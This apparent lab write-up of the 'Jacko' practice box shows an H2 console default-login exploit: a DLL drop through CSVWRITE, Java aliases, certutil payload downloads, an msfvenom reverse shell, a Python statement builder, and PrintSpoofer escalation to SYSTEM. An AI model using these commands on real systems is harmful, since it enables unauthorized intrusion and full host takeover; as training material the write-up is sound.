Jacko - OSPG
Summary Of Result
During enumeration we discover an H2 database web console running with default credentials on the target. H2 lets an administrative database user alias and call arbitrary Java methods, which we turn into remote code execution as the service account. We then escalate to SYSTEM by abusing the SeImpersonatePrivilege that this account holds.
Attack Narrative
The attack is summed up within three stages:
- Enumeration.
- Exploitation.
- Administrative Privilege Escalation.
Enumeration
We start with an nmap scan.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
7680/tcp open tcpwrapped syn-ack ttl 127
8082/tcp open http syn-ack ttl 127 H2 database http console
|_http-favicon: Unknown favicon MD5: D2FBC2E4FB758DC8672CDEFB4D924540
| http-methods:
|_ Supported Methods: GET POST
|_http-title: H2 Console
- Several ports are open on the target. The HTTP service on port 8082, identified as an H2 database web console, is the one that draws our attention.
H2 Database - Port 8082
Navigating to the site, we are redirected to a login page.
$ curl -s http://192.168.60.66:8082/login.jsp?jsessionid=67d97f9e84ff28caa571dba2a900edb3 | html2text
[One of: Čeština/Deutsch/English/Español/Français/Magyar/한국어/Indonesia/
Italiano/日本語/Nederlands/Polski/Português (Brasil)/Português (Europeu)/русский/
Slovensky/Türkçe/Українська/中文 (简体)/中文 (繁體)] Preferences Tools Help
Login
[One of: Generic H2 (Embedded)/Generic H2 (Server)/Generic
Derby (Embedded)/Generic Derby (Server)/Generic HSQLDB/Generic
MySQL/Generic PostgreSQL/Generic MS SQL Server 2005/Generic MS
Saved Settings: SQL Server 2000/Generic Oracle/Generic DB2/Generic SQLite/
Generic Firebird Server/Generic Azure SQL/Generic Hive/Generic
Hive 2/Generic Impala/Generic Redshift/Generic Snowflake/
Generic Teradata/Generic JNDI Data Source]
Setting Name: [Generic H2 (Embedded)] [Unknown INPUT type] [Unknown INPUT
type]
==============================================================================
Driver Class: [org.h2.Driver ]
JDBC_URL: [jdbc:h2:~/test ]
User Name: [sa ]
Password: [********************]
[Connect] [Unknown INPUT type]
Testing some weak credentials (admin:admin, admin:password, root:root, root:toor) gets us nowhere.
After some research we find that the console accepts H2's default credentials: the user sa with an empty password (the login form even pre-fills the user name). This is not a bypass of the login page but a valid login, and it connects us as the database administrator.
We also note that the H2 version is 1.4.199, for which a public exploit exists. The underlying primitive is not version-specific, though: an administrative H2 user can create an alias for any Java static method (unless the deployment restricts the h2.allowedClasses system property, which defaults to *), so administrative database access here amounts to code execution inside the H2 JVM.
$ searchsploit H2 1.4.199
-------------------------------------------- --------------------------
 Exploit Title                              | Path
-------------------------------------------- --------------------------
H2 Database 1.4.199 - JNI Code Execution    | java/local/49384.txt
-------------------------------------------- --------------------------
Exploitation
H2 Database Exploitation
- Following the public exploit, we first use CSVWRITE to drop the exploit's DLL on disk. The DLL bytes are passed as the column alias of a SELECT NULL query; with the ISO-8859-1 charset and empty field-separator, field-delimiter, escape, null and line-separator options, CSVWRITE writes only the header row, i.e. the alias, to the file byte for byte. The payload bytes are elided here.
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "' [...] 'ISO-8859-1', '', '', '', '', '');
- Next, we alias java.lang.System.load and call it to load the DLL into the H2 process. The DLL provides a JNIScriptEngine class whose eval method evaluates a JavaScript snippet inside the JVM; the final payload below is written in that syntax.
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load"; CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll');
- Then we craft a reverse shell with msfvenom. LHOST must be our current VPN address: the payload and the download URL used later hard-code it, so both have to be regenerated if the lab IP changes.
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.60 LPORT=80 -f exe -o WebIIS.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: WebIIS.exe
- We host a web server to transfer the payload and set up a nc listener to catch the reverse shell. On the first terminal, host a web server on port 8082:
$ python3 -m http.server 8082
- On the second terminal, start a nc listener on port 80:
$ sudo nc -nlvp 80
- Finally, we alias the DLL's JNIScriptEngine.eval and call it twice: once to fetch WebIIS.exe with certutil, once to run it. The second CALL does not return while the shell is alive, because the Scanner reads the child's stdout until it closes; that is expected.
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -f -urlcache -split \"http://192.168.49.60:8082/WebIIS.exe\" \"C:\\Windows\\Temp\\WebIIS.exe\"").getInputStream()).useDelimiter("\\Z").next()');
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\Windows\\Temp\\WebIIS.exe").getInputStream()).useDelimiter("\\Z").next()');
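As an added example (not code from this write-up or from the public exploit), the following Python script builds the CSVWRITE file-drop statement from the steps above and simulates what H2 writes for it, so the byte-for-byte round trip can be checked before anything touches the target. The exploit elides how the DLL bytes are embedded in the query; encoding each byte as a CHAR(n) argument to CONCAT is this example's own choice, made so the statement stays printable and can be pasted into the web console. The DLL itself still comes from the public exploit; the sample bytes below are constructed.

```python
"""
Build the H2 CSVWRITE file-drop statement and simulate what H2 writes.

Added example, not from the original write-up or the public exploit.
Assumption: payload bytes are embedded as CHAR(n) arguments to CONCAT;
the exploit elides this part, so its exact encoding is not known.
"""


def inner_query(payload: bytes) -> str:
    """The string H2's CONCAT(...) evaluates to: SELECT NULL "<payload>".
    Inside a quoted identifier a double quote must be doubled."""
    alias = payload.decode("latin-1").replace('"', '""')
    return f'SELECT NULL "{alias}"'


def concat_args(payload: bytes) -> str:
    """Argument list for CONCAT: one CHAR(n) per byte, so the statement is
    printable. Byte 0x22 (") is emitted twice to produce the doubled quote
    that the quoted identifier needs."""
    parts = ["'SELECT NULL \"'"]
    for b in payload:
        parts.append(f"CHAR({b})")
        if b == 0x22:
            parts.append("CHAR(34)")
    parts.append("'\"'")
    return ", ".join(parts)


def build_csvwrite(path: str, payload: bytes) -> str:
    """Full statement. The options after the query are: charset, field
    separator, field delimiter, escape character, null string, line
    separator. ISO-8859-1 maps chars 0..255 to single bytes; the empty
    escape character makes H2 write the header row unescaped; the empty
    null string and line separator make the single NULL data row contribute
    nothing. CSVWRITE truncates the target file, so one file needs exactly
    one statement."""
    sql_path = path.replace("'", "''")
    return (f"SELECT CSVWRITE('{sql_path}', CONCAT({concat_args(payload)}), "
            f"'ISO-8859-1', '', '', '', '', '');")


def simulate_csvwrite(query: str) -> bytes:
    """What H2 writes for SELECT NULL "..." under the options above: only
    the header row, i.e. the column alias, encoded as ISO-8859-1."""
    prefix = 'SELECT NULL "'
    if not (query.startswith(prefix) and query.endswith('"')):
        raise ValueError("not a SELECT NULL \"...\" query")
    alias = query[len(prefix):-1].replace('""', '"')
    return alias.encode("latin-1")


def statements(dll_path: str, payload: bytes) -> list[str]:
    """The drop / load / alias chain from the write-up, ready to paste."""
    return [
        build_csvwrite(dll_path, payload),
        'CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";',
        f"CALL System_load('{dll_path}');",
        'CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";',
    ]


if __name__ == "__main__":
    # Constructed sample: the start of a PE header plus a quote and 0xFF,
    # the byte values that need care. Replace with open(dll, "rb").read().
    sample = b'MZ\x90\x00"\xff'
    assert simulate_csvwrite(inner_query(sample)) == sample
    for stmt in statements(r"C:\Windows\Temp\JNIScriptEngine.dll", sample):
        print(stmt)
```

A real DLL yields one statement with tens of thousands of arguments; since CSVWRITE truncates the file on every call, the drop cannot be split across several statements. The CALL of JNIScriptEngine_eval is left out on purpose: the command it runs is the operator's choice and is shown in the step above.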
If everything works, the reverse connection arrives on port 80 as tony.
nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.49.234] from (UNKNOWN) [192.168.234.66] 49770
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\H2\service>set PATH=%SystemRoot%\system32;%SystemRoot%;
set PATH=%SystemRoot%\system32;%SystemRoot%;
C:\Program Files (x86)\H2\service>whoami
whoami
jacko\tony
Administrative Privilege Escalation
Checking the privileges of tony shows that the account holds SeImpersonatePrivilege, which is enough to escalate.
C:\Program Files (x86)\H2\service>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
...
SeImpersonatePrivilege Impersonate a client after authentication Enabled
...
We can abuse it with PrintSpoofer, which coerces the Print Spooler into connecting to a named pipe we control and impersonates the SYSTEM token it obtains; the Spooler service must be running, which it is by default on Windows 10.
All we have to do is transfer PrintSpoofer to the target, which certutil can do from the web server we already have running.
C:\Program Files (x86)\H2\service>certutil -f -urlcache -split "http://192.168.49.234:8082/PrintSpoofer64.exe" "C:\\Windows\\Temp\\PrintSpoofer64.exe"
certutil -f -urlcache -split "http://192.168.49.234:8082/PrintSpoofer64.exe" "C:\\Windows\\Temp\\PrintSpoofer64.exe"
**** Online ****
0000 ...
6a00
CertUtil: -URLCache command completed successfully.
Once the file has been transferred, we run PrintSpoofer with -i (interact with the new process from the current shell) and -c cmd (the command to spawn):
C:\Program Files (x86)\H2\service>C:\\Windows\\Temp\\PrintSpoofer64.exe -i -c cmd
C:\\Windows\\Temp\\PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
and we have a shell as NT AUTHORITY\SYSTEM, the highest local privilege level on the box.